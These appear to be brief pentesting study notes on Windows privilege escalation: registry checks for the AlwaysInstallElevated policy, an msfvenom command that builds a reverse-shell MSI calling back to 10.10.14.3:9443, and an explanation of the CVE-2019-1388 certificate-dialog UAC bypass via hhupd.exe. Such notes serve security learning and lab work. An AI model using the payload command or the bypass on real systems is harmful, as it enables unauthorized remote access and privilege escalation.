https://lolbas-project.github.io/
Check:
reg query HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
CVE-2019-1388
was a privilege escalation vulnerability in the Windows Certificate
Dialog, which did not properly enforce user privileges. The issue was in
the UAC mechanism, which presented an option to show information about
an executable's certificate, opening the Windows certificate dialog when
a user clicks the link. The Issued By
field in the General tab is rendered as a hyperlink if the binary is
signed with a certificate that has Object Identifier (OID) 1.3.6.1.4.1.311.2.1.10. This OID value is identified in the wintrust.h header as SPC_SP_AGENCY_INFO_OBJID which is the SpcSpAgencyInfo
field in the details tab of the certificate dialog. If it is present, a
hyperlink included in the field will render in the General tab. This
vulnerability can be exploited easily using an old Microsoft-signed
executable (hhupd.exe) that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.
Vulnerable windows versions: https://web.archive.org/web/20210620053630/https://gist.github.com/gentilkiwi/802c221c0731c06c22bb75650e884e5a
Patched in november 2019